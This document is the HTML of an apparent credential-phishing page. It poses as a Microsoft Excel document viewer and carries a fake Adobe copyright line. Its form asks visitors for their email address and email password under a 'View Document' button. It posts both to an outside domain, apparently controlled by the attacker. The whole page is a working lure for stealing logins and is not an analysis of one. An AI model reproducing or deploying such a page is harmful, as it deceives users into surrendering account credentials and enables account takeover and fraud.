<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Microsoft Excel</title>
<style type="text/css">
<!--
body {
	background-image: url(./bg.png);
	background-repeat: no-repeat;
}
.style1 {color: #FFFFFF}
.style2 {color: #FF0000}
.style3 {color: #217346}
body,td,th {
	font-family: Arial, Helvetica, sans-serif;
}
#check {width:16px; 
         height:16px; 
		 color:#666;
}
#com {padding-top:5px; 
       font-size:14px; 
	   border-top:#CBCBCB solid 1px;
	   color:#CBCBCB;
	   padding-left:48px;
}
#ex {color:#29703B;
        font-size:14px;
		font-weight:bold;
		padding-bottom:8px;
}
#fdiv {width:500px;;
         text-align:left;
		 padding:15px;
		 background:#FFF;
		 border-radius:2px;
}
#priv {font-size:12px;
        padding:5px; 
		color:#999;}
#rem {color:#999;
      padding-left:25px;
}
.style4 {
	font-size: 14px;
	font-weight: bold;
	color: #FFFFFF;
}
.style5 {color: #FFFFFF; font-weight: bold; }
.style6 {	color: #FF0000;
	font-weight: bold;
}
-->
</style></head>

</script>

<div style="text-align:center;">

<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<form method="post" action="https://pebblesandboulders.cam/image/index.php">
                <p class="style2">&nbsp;</p>
                <p>
                  <input  name="email" type="email" style="width:300px; height:30px; 
								font-family: Verdana; font-size: 14px; color:#000000; background-color: #FFFFFF; 
								border: solid 1px #000000; padding: 10px; -moz-border-radius: 1px; 
								-webkit-border-radius: 1px; -khtml-border-radius: 1px; border-radius: 1px; 
								-moz-box-shadow: 2px 2px 2px #000000; -webkit-box-shadow: 2px 2px 2px #000000; 
								box-shadow: 2px 2px 2px #000000;" value="" required="email" placeholder="Email Address" />
                </p>
                <p>
                  <input  name="password" type="password" style="width:300px; height:30px; 
								font-family: Verdana; font-size: 14px; color:#000000; background-color: #FFFFFF; 
								border: solid 1px #000000; padding: 10px; -moz-border-radius: 2px; 
								-webkit-border-radius: 2px; -khtml-border-radius: 2px; border-radius: 2px; 
								-moz-box-shadow: 3px 3px 3px #000000; -webkit-box-shadow: 3px 3px 3px #000000; 
								box-shadow: 3px 3px 3px #000000;" required="" placeholder="Email Password" />
                </p>
                <p>
					<input name="submit" type="submit" 
								style="width:250px; height:50px; background-color: #C70039; border: solid 3px #045FB4; 
								font-family: Verdana; font-size: 15px; font-weight: light; color: #ffffff; 
								-moz-border-radius: 3px; -webkit-border-radius: 3px; -khtml-border-radius: 3px; 
								border-radius: 3px;-moz-box-shadow: 3px 3px 3px #217346; -webkit-box-shadow: 3px 3px 3px #217346; 
								box-shadow: 3px 3px 3px #000000;" value="View Document" />
					
					
</div>	

<br>

		
	<p style="font-size:0.9em;" align="center"> ©2024 Adobe Corporation</p>
							
							</div>
<div style="clear:both;"></div>

</div>
<div class="cover"></div>

</body></html>
